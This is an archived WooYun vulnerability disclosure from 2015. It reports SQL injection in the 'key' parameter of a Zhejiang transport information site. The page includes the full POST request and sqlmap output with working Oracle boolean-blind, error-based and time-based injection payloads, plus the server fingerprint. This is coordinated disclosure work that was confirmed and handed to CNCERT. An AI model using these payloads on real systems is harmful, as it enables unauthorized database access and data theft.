当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157097

漏洞标题: 浙江交通分站存在sql注入漏洞涉及45个库

相关厂商:cncert国家互联网应急中心

漏洞作者: 无名人

提交时间:2015-12-02 02:00

修复时间:2016-01-18 16:50

公开时间:2016-01-18 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

RT

详细说明:

http://**.**.**.**/MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6
漏洞地址:

POST /MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 2667
Cache-Control: no-cache
Origin: http://**.**.**.**
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://**.**.**.**/MarketInfo/Search/marketInfoListPb.aspx?iURLFlag=4&marketInfoSort=6
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=tgenqt2jroyfgervrkvrvru0
ScriptManager1=updatepanel1%7Csearch&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTk3MDU0MTAzD2QWAgIDD2QWBAIDD2QWAgIBDw8WAh4EVGV4dAUO5oKo5aW9LCDmuLjlrqJkZAIFD2QWAmYPZBYCAgkPZBYCZg9kFgQCAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCmQWAmYPZBYYZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDxUDBDIxMjaPAee7jeWFtOa7qOa1t%2BS6p%2BS4mumbhuiBmuWMuumSsea4heiHs%2Ba7qOa1t%2BW3peS4muWMuuWFrOi3r%2BW3peeoi%2BaWveW3pe%2B8iOWcn%2BW7ujPmoIfvvInlkozmlr3lt6Xnm5HnkIbvvIjnrKwy5ZCI5ZCM5q6177yJ5oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDlkAgIPZBYCAgEPZBYCZg8VAwQyMTI1V%2BS5jeWYieiLj%2Be6v%2BWNl%2Ba5luWMuuiIqumBk%2BWFu%2BaKpOW3peeoi%2B%2B8iOWFreacn%2B%2B8ieaWveW3peebkeeQhuaLm%2BaKleagh%2Be7k%2BaenOWFrOekuuihqAoyMDE1LTA3LTA4ZAIDD2QWAgIBD2QWAmYPFQMEMjEyNFXnu43or7jpq5jpgJ%2Flhazot68yMDE15bm05rKl6Z2S6Lev6Z2i5YW75oqk5LiT6aG55bel56iL5pa95bel5oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDhkAgQPZBYCAgEPZBYCZg8VAwQyMTIzbTMxMOecgemBk%2BiIn%2BWxseacseWutuWwluaute%2B8iEsyKzQwMO%2B9nks1KzUwMO%2B8jEs5KzgwMO%2B9nksxMSswODbvvInlt6XnqIvmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wN2QCBQ9kFgICAQ9kFgJmDxUDBDIxMjJj5bKx5bGx5Y6%2F5a6Y5bGx6Iez56eA5bGx5YWs6Lev56eA5bGx5aSn5qGl5bel56iL5pa95bel55uR55CG56ysWC1KTC0y5qCH5q615oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDZkAgYPZBYCAgEPZBYCZg8VAwQyMTIxUeeOi%2Baxn%2BazvumVh%2BWMl%2BiNt%2BiHs%2BWNl%2Baxh%2BWGnOadkeWFrOi3r%2BW3peeoi%2BaWveW3peebkeeQhuaLm%2BaKleagh%2Be7k%2BaenOWFrOekuuihqAoyMDE1LTA3LTA2ZAIHD2QWAgIBD2QWAmYPFQMEMjEyMGnmtZnmsZ%2FnnIHmna3lt57vvIjnuqLlnqbvvInoh7Pph5HljY7pq5jpgJ%2Flhazot6%2FmlLnmianlu7rlt6XnqIvmnLrnlLXmlr3lt6Xnm5HnkIbmi5vmoIfor4TmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wMWQCCA9kFgICAQ9kFgJmDxUDBDIxMTlp5rWZ5rGf55yB5p2t5bee77yI57qi5Z6m77yJ6Iez6YeR5Y2O6auY6YCf5YWs6Lev5pS55omp5bu65bel56iL5oi%2F5bu65pa95bel55uR55CG5oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMzBkAgkPZBYCAgEPZBYCZg8VAwQyMTE4ggHmna3nu43lj7Dpq5jpgJ%2Flhazot6%2Flt6XnqIvnu43lhbTph5HljY7mrrXnrKxIU1QtVEowM%2Bagh%2BauteWcn%2BW7uuaWveW3peaLm%2Bagh%2BOAgeesrEhTVC1KTDAy55uR55CG5ZCI5ZCM5q615oub5qCH6K%2BE5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMTlkAgoPZBYCAgEPZBYCZg8VAwQyMTE3ZDMyOeWbvemBk%2BiIn%2BWxseauteaUueW7uuW3peeoi%2B%2B8iOaZrumZgOaute%2B8iUs0Mis0MzEuNe%2B9nks0OSszMTjmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNi0xN2QCCw8PFgIfA2hkZAIDDw8WBh4JUGFnZUluZGV4Zh4IUGFnZVNpemUCCh4MVG90YWxSZWNvcmRzArQBZGQYAQUJR3JpZFZpZXcxDzwrAAoBCAIBZJihcKmH%2BiNUFAIwiqNlr9UBJcWz&__EVENTVALIDATION=%2FwEWEQLy%2Ffq6AgKA%2BP2pCQLigPTXCQLH0pL8CQKi6If1BQLzo%2BG0BALYusOfCgKp9pzfCAKOjf%2FJDgLfyNiJDQLE37r0AgLlh7fgDgLKnpnLBAKMr4KNBQLh3Pb1DQKN6Z%2B0DQKtj6%2F%2BBw6amyUSMU1LokNp8zcZCmoGihWd&key=1&pager%24GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2


key参数存在注入

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ScriptManager1=updatepanel1|search&__EVENTTARGET=&__EVENTARGUMENT=&
__VIEWSTATE=/wEPDwUJOTk3MDU0MTAzD2QWAgIDD2QWBAIDD2QWAgIBDw8WAh4EVGV4dAUO5oKo5aW9
LCDmuLjlrqJkZAIFD2QWAmYPZBYCAgkPZBYCZg9kFgQCAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4L
XyFJdGVtQ291bnQCCmQWAmYPZBYYZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDxUDBDIxMjaP
Aee7jeWFtOa7qOa1t+S6p+S4mumbhuiBmuWMuumSsea4heiHs+a7qOa1t+W3peS4muWMuuWFrOi3r+W3
peeoi+aWveW3pe+8iOWcn+W7ujPmoIfvvInlkozmlr3lt6Xnm5HnkIbvvIjnrKwy5ZCI5ZCM5q6177yJ
5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDlkAgIPZBYCAgEPZBYCZg8VAwQyMTI1V+S5
jeWYieiLj+e6v+WNl+a5luWMuuiIqumBk+WFu+aKpOW3peeoi++8iOWFreacn++8ieaWveW3peebkeeQ
huaLm+aKleagh+e7k+aenOWFrOekuuihqAoyMDE1LTA3LTA4ZAIDD2QWAgIBD2QWAmYPFQMEMjEyNFXn
u43or7jpq5jpgJ/lhazot68yMDE15bm05rKl6Z2S6Lev6Z2i5YW75oqk5LiT6aG55bel56iL5pa95bel
5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDhkAgQPZBYCAgEPZBYCZg8VAwQyMTIzbTMx
MOecgemBk+iIn+WxseacseWutuWwluaute+8iEsyKzQwMO+9nks1KzUwMO+8jEs5KzgwMO+9nksxMSsw
ODbvvInlt6XnqIvmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wN2QC
BQ9kFgICAQ9kFgJmDxUDBDIxMjJj5bKx5bGx5Y6/5a6Y5bGx6Iez56eA5bGx5YWs6Lev56eA5bGx5aSn
5qGl5bel56iL5pa95bel55uR55CG56ysWC1KTC0y5qCH5q615oub5qCH6K+E5qCH57uT5p6c5YWs56S6
CjIwMTUtMDctMDZkAgYPZBYCAgEPZBYCZg8VAwQyMTIxUeeOi+axn+azvumVh+WMl+iNt+iHs+WNl+ax
h+WGnOadkeWFrOi3r+W3peeoi+aWveW3peebkeeQhuaLm+aKleagh+e7k+aenOWFrOekuuihqAoyMDE1
LTA3LTA2ZAIHD2QWAgIBD2QWAmYPFQMEMjEyMGnmtZnmsZ/nnIHmna3lt57vvIjnuqLlnqbvvInoh7Pp
h5HljY7pq5jpgJ/lhazot6/mlLnmianlu7rlt6XnqIvmnLrnlLXmlr3lt6Xnm5HnkIbmi5vmoIfor4Tm
oIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wMWQCCA9kFgICAQ9kFgJmDxUDBDIxMTlp5rWZ5rGf55yB5p2t
5bee77yI57qi5Z6m77yJ6Iez6YeR5Y2O6auY6YCf5YWs6Lev5pS55omp5bu65bel56iL5oi/5bu65pa9
5bel55uR55CG5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMzBkAgkPZBYCAgEPZBYCZg8V
AwQyMTE4ggHmna3nu43lj7Dpq5jpgJ/lhazot6/lt6XnqIvnu43lhbTph5HljY7mrrXnrKxIU1QtVEow
M+agh+auteWcn+W7uuaWveW3peaLm+agh+OAgeesrEhTVC1KTDAy55uR55CG5ZCI5ZCM5q615oub5qCH
6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMTlkAgoPZBYCAgEPZBYCZg8VAwQyMTE3ZDMyOeWbvemB
k+iIn+WxseauteaUueW7uuW3peeoi++8iOaZrumZgOaute+8iUs0Mis0MzEuNe+9nks0OSszMTjmlr3l
t6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNi0xN2QCCw8PFgIfA2hkZAIDDw8W
Bh4JUGFnZUluZGV4Zh4IUGFnZVNpemUCCh4MVG90YWxSZWNvcmRzArQBZGQYAQUJR3JpZFZpZXcxDzwr
AAoBCAIBZJihcKmH+iNUFAIwiqNlr9UBJcWz&__EVENTVALIDATION=/wEWEQLy/fq6AgKA+P2pCQLig
PTXCQLH0pL8CQKi6If1BQLzo+G0BALYusOfCgKp9pzfCAKOjf/JDgLfyNiJDQLE37r0AgLlh7fgDgLKn
pnLBAKMr4KNBQLh3Pb1DQKN6Z+0DQKtj6/+Bw6amyUSMU1LokNp8zcZCmoGihWd&key=1%' AND 5697
=5697 AND '%'='&pager$GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: ScriptManager1=updatepanel1|search&__EVENTTARGET=&__EVENTARGUMENT=&
__VIEWSTATE=/wEPDwUJOTk3MDU0MTAzD2QWAgIDD2QWBAIDD2QWAgIBDw8WAh4EVGV4dAUO5oKo5aW9
LCDmuLjlrqJkZAIFD2QWAmYPZBYCAgkPZBYCZg9kFgQCAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4L
XyFJdGVtQ291bnQCCmQWAmYPZBYYZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDxUDBDIxMjaP
Aee7jeWFtOa7qOa1t+S6p+S4mumbhuiBmuWMuumSsea4heiHs+a7qOa1t+W3peS4muWMuuWFrOi3r+W3
peeoi+aWveW3pe+8iOWcn+W7ujPmoIfvvInlkozmlr3lt6Xnm5HnkIbvvIjnrKwy5ZCI5ZCM5q6177yJ
5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDlkAgIPZBYCAgEPZBYCZg8VAwQyMTI1V+S5
jeWYieiLj+e6v+WNl+a5luWMuuiIqumBk+WFu+aKpOW3peeoi++8iOWFreacn++8ieaWveW3peebkeeQ
huaLm+aKleagh+e7k+aenOWFrOekuuihqAoyMDE1LTA3LTA4ZAIDD2QWAgIBD2QWAmYPFQMEMjEyNFXn
u43or7jpq5jpgJ/lhazot68yMDE15bm05rKl6Z2S6Lev6Z2i5YW75oqk5LiT6aG55bel56iL5pa95bel
5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDhkAgQPZBYCAgEPZBYCZg8VAwQyMTIzbTMx
MOecgemBk+iIn+WxseacseWutuWwluaute+8iEsyKzQwMO+9nks1KzUwMO+8jEs5KzgwMO+9nksxMSsw
ODbvvInlt6XnqIvmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wN2QC
BQ9kFgICAQ9kFgJmDxUDBDIxMjJj5bKx5bGx5Y6/5a6Y5bGx6Iez56eA5bGx5YWs6Lev56eA5bGx5aSn
5qGl5bel56iL5pa95bel55uR55CG56ysWC1KTC0y5qCH5q615oub5qCH6K+E5qCH57uT5p6c5YWs56S6
CjIwMTUtMDctMDZkAgYPZBYCAgEPZBYCZg8VAwQyMTIxUeeOi+axn+azvumVh+WMl+iNt+iHs+WNl+ax
h+WGnOadkeWFrOi3r+W3peeoi+aWveW3peebkeeQhuaLm+aKleagh+e7k+aenOWFrOekuuihqAoyMDE1
LTA3LTA2ZAIHD2QWAgIBD2QWAmYPFQMEMjEyMGnmtZnmsZ/nnIHmna3lt57vvIjnuqLlnqbvvInoh7Pp
h5HljY7pq5jpgJ/lhazot6/mlLnmianlu7rlt6XnqIvmnLrnlLXmlr3lt6Xnm5HnkIbmi5vmoIfor4Tm
oIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wMWQCCA9kFgICAQ9kFgJmDxUDBDIxMTlp5rWZ5rGf55yB5p2t
5bee77yI57qi5Z6m77yJ6Iez6YeR5Y2O6auY6YCf5YWs6Lev5pS55omp5bu65bel56iL5oi/5bu65pa9
5bel55uR55CG5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMzBkAgkPZBYCAgEPZBYCZg8V
AwQyMTE4ggHmna3nu43lj7Dpq5jpgJ/lhazot6/lt6XnqIvnu43lhbTph5HljY7mrrXnrKxIU1QtVEow
M+agh+auteWcn+W7uuaWveW3peaLm+agh+OAgeesrEhTVC1KTDAy55uR55CG5ZCI5ZCM5q615oub5qCH
6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMTlkAgoPZBYCAgEPZBYCZg8VAwQyMTE3ZDMyOeWbvemB
k+iIn+WxseauteaUueW7uuW3peeoi++8iOaZrumZgOaute+8iUs0Mis0MzEuNe+9nks0OSszMTjmlr3l
t6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNi0xN2QCCw8PFgIfA2hkZAIDDw8W
Bh4JUGFnZUluZGV4Zh4IUGFnZVNpemUCCh4MVG90YWxSZWNvcmRzArQBZGQYAQUJR3JpZFZpZXcxDzwr
AAoBCAIBZJihcKmH+iNUFAIwiqNlr9UBJcWz&__EVENTVALIDATION=/wEWEQLy/fq6AgKA+P2pCQLig
PTXCQLH0pL8CQKi6If1BQLzo+G0BALYusOfCgKp9pzfCAKOjf/JDgLfyNiJDQLE37r0AgLlh7fgDgLKn
pnLBAKMr4KNBQLh3Pb1DQKN6Z+0DQKtj6/+Bw6amyUSMU1LokNp8zcZCmoGihWd&key=1%' AND 9225
=CTXSYS.DRITHSX.SN(9225,(CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113)||(SELE
CT (CASE WHEN (9225=9225) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR
(106)||CHR(112)||CHR(113))) AND '%'='&pager$GoToPage=&__ASYNCPOST=true&search=%E
6%9F%A5%E8%AF%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: ScriptManager1=updatepanel1|search&__EVENTTARGET=&__EVENTARGUMENT=&
__VIEWSTATE=/wEPDwUJOTk3MDU0MTAzD2QWAgIDD2QWBAIDD2QWAgIBDw8WAh4EVGV4dAUO5oKo5aW9
LCDmuLjlrqJkZAIFD2QWAmYPZBYCAgkPZBYCZg9kFgQCAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4L
XyFJdGVtQ291bnQCCmQWAmYPZBYYZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDxUDBDIxMjaP
Aee7jeWFtOa7qOa1t+S6p+S4mumbhuiBmuWMuumSsea4heiHs+a7qOa1t+W3peS4muWMuuWFrOi3r+W3
peeoi+aWveW3pe+8iOWcn+W7ujPmoIfvvInlkozmlr3lt6Xnm5HnkIbvvIjnrKwy5ZCI5ZCM5q6177yJ
5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDlkAgIPZBYCAgEPZBYCZg8VAwQyMTI1V+S5
jeWYieiLj+e6v+WNl+a5luWMuuiIqumBk+WFu+aKpOW3peeoi++8iOWFreacn++8ieaWveW3peebkeeQ
huaLm+aKleagh+e7k+aenOWFrOekuuihqAoyMDE1LTA3LTA4ZAIDD2QWAgIBD2QWAmYPFQMEMjEyNFXn
u43or7jpq5jpgJ/lhazot68yMDE15bm05rKl6Z2S6Lev6Z2i5YW75oqk5LiT6aG55bel56iL5pa95bel
5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDctMDhkAgQPZBYCAgEPZBYCZg8VAwQyMTIzbTMx
MOecgemBk+iIn+WxseacseWutuWwluaute+8iEsyKzQwMO+9nks1KzUwMO+8jEs5KzgwMO+9nksxMSsw
ODbvvInlt6XnqIvmlr3lt6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wN2QC
BQ9kFgICAQ9kFgJmDxUDBDIxMjJj5bKx5bGx5Y6/5a6Y5bGx6Iez56eA5bGx5YWs6Lev56eA5bGx5aSn
5qGl5bel56iL5pa95bel55uR55CG56ysWC1KTC0y5qCH5q615oub5qCH6K+E5qCH57uT5p6c5YWs56S6
CjIwMTUtMDctMDZkAgYPZBYCAgEPZBYCZg8VAwQyMTIxUeeOi+axn+azvumVh+WMl+iNt+iHs+WNl+ax
h+WGnOadkeWFrOi3r+W3peeoi+aWveW3peebkeeQhuaLm+aKleagh+e7k+aenOWFrOekuuihqAoyMDE1
LTA3LTA2ZAIHD2QWAgIBD2QWAmYPFQMEMjEyMGnmtZnmsZ/nnIHmna3lt57vvIjnuqLlnqbvvInoh7Pp
h5HljY7pq5jpgJ/lhazot6/mlLnmianlu7rlt6XnqIvmnLrnlLXmlr3lt6Xnm5HnkIbmi5vmoIfor4Tm
oIfnu5PmnpzlhaznpLoKMjAxNS0wNy0wMWQCCA9kFgICAQ9kFgJmDxUDBDIxMTlp5rWZ5rGf55yB5p2t
5bee77yI57qi5Z6m77yJ6Iez6YeR5Y2O6auY6YCf5YWs6Lev5pS55omp5bu65bel56iL5oi/5bu65pa9
5bel55uR55CG5oub5qCH6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMzBkAgkPZBYCAgEPZBYCZg8V
AwQyMTE4ggHmna3nu43lj7Dpq5jpgJ/lhazot6/lt6XnqIvnu43lhbTph5HljY7mrrXnrKxIU1QtVEow
M+agh+auteWcn+W7uuaWveW3peaLm+agh+OAgeesrEhTVC1KTDAy55uR55CG5ZCI5ZCM5q615oub5qCH
6K+E5qCH57uT5p6c5YWs56S6CjIwMTUtMDYtMTlkAgoPZBYCAgEPZBYCZg8VAwQyMTE3ZDMyOeWbvemB
k+iIn+WxseauteaUueW7uuW3peeoi++8iOaZrumZgOaute+8iUs0Mis0MzEuNe+9nks0OSszMTjmlr3l
t6Xnm5HnkIbmi5vmoIfmipXmoIfnu5PmnpzlhaznpLoKMjAxNS0wNi0xN2QCCw8PFgIfA2hkZAIDDw8W
Bh4JUGFnZUluZGV4Zh4IUGFnZVNpemUCCh4MVG90YWxSZWNvcmRzArQBZGQYAQUJR3JpZFZpZXcxDzwr
AAoBCAIBZJihcKmH+iNUFAIwiqNlr9UBJcWz&__EVENTVALIDATION=/wEWEQLy/fq6AgKA+P2pCQLig
PTXCQLH0pL8CQKi6If1BQLzo+G0BALYusOfCgKp9pzfCAKOjf/JDgLfyNiJDQLE37r0AgLlh7fgDgLKn
pnLBAKMr4KNBQLh3Pb1DQKN6Z+0DQKtj6/+Bw6amyUSMU1LokNp8zcZCmoGihWd&key=1%' AND 1752
=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(119)||CHR(82)||CHR(71),5) AND '%'='&page
r$GoToPage=&__ASYNCPOST=true&search=%E6%9F%A5%E8%AF%A2
---
[16:34:15] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


漏洞证明:

1.png

修复方案:

版权声明:转载请注明来源 无名人@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-04 16:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.

最新状态:

暂无